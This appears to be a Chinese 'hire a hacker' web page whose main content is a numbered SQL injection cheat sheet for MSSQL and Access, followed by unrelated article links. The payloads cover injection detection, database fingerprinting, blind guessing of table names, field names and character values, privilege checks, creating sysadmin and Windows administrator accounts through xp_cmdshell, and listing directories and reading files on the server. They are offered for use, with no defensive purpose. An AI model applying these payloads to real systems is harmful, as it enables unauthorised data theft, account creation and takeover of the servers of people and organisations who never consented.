找黑客平台

黑客大户的联系方式-黑帽黑客入门(如何成为黑客 基础入门

访客3年前关于黑客接单422

1.判断是否有注入
;and1=1
;and1=2

2.初步判断是否是mssql
;anduser>0

3.注入参数是字符
'and[查询条件]and''='

4.搜索时没过滤参数的
'and[查询条件]and'%25'='

5.判断数据库系统
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access

6.猜数据库
;and(SelectCount(*)from[数据库名])>0

7.猜字段
;and(SelectCount(字段名)from数据库名)>0

8.猜字段中记录长度
;and(selecttop1len(字段名)from数据库名)>0

9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0

(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0

10.测试权限结构(mssql)
;and1=(SelectIS_SRVROLEMEMBER('sysadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('serveradmin'));--
;and1=(SelectIS_SRVROLEMEMBER('setupadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('securityadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('diskadmin'));--
;and1=(SelectIS_SRVROLEMEMBER('bulkadmin'));--
;and1=(SelectIS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add';--
;execmaster.dbo.xp_cmdshell'netuserusernamepassword/add';--
;execmaster.dbo.xp_cmdshell'netlocalgroupadministratorsusername/add';--

12.(1)遍历目录
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:\'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin('上步得到的paths'))>)

(2)遍历目录
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:\web\index.asp';--查看文件的内容

返回列表

上一篇:JOOWAA初画婴儿手推车怎么样 JOOWAA初画婴儿手推车使用测评

下一篇:开网店货源去哪找(想开淘宝网店怎么注册)

相关文章

商标注册申请受理通知书(商标15天受理通知书)

商标注册申请受理通知书(商标15天受理通知书)

商标申请后一个月左右受理通知书。 商标申请的流程: 1、形式审查。 2、实质审查。 3、复审请求。 【法律依据】 《商标法》第二十八条,对申请注册的商标,商标局应当自收到商标注册申请文...

FreeDTV有哪些打开使用,FreeDTV使用教程

FreeDTV是一款非常好影视播放的手机软件,吸引住了许多小伙伴们下手。下面我就来解读FreeDTV使用方法方式,坚信一定能够协助到有必须的盆友。...

哈布斯堡下巴(哈布斯堡家族现状)

斯堡下巴(哈布斯堡家族现状) 中外历史上有大量名人近亲结婚的事例,害得我小时候还以为表妹就是表哥的专属配置,这当中最突出的,莫过于欧洲的哈布斯堡王朝,所有皇室成员都拥有一个“突出的”哈布斯堡下巴。...

燕之坊怎么加盟?加盟流程是什么?

燕之坊怎么加盟?加盟流程是什么?

燕之坊加盟项目作为如今市场上广受存眷的项目之一。自然而然就受到了各人的遍及存眷。许多加盟商都想要加盟到燕之坊项目中去,可是呢各人都不知道燕之坊项目怎么加盟,假如你也想要知道燕之坊问题的谜底的话,那么你...

割包皮是什么意思(割包皮最佳的年龄)

割包皮是什么意思(割包皮最佳的年龄)

当小男孩刚刚出生时,龟头会被包皮紧紧地包裹着,这是正常的生理现象。过长的包皮起到天然的保护作用,并不会影响到孩子的排尿和健康。当孩子3岁后,包皮和龟头粘连分离形成柔软的外套并开始分离。 但如果包...

房产知识:买二手房,卖家也是买过来的,但房

相信现在有很多的朋友们对于买二手房,卖家也是买过来的,但房产证都还没拿到,只有房子钥匙,要买需要一次性付清的都想要了解吧,那么今天小编就来给大家针对买二手房,卖家也是买过来的,但房产证都还没拿到,只有...

Copyright Your WebSite.Some Rights Reserved.

免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!

Hacker by Hacker.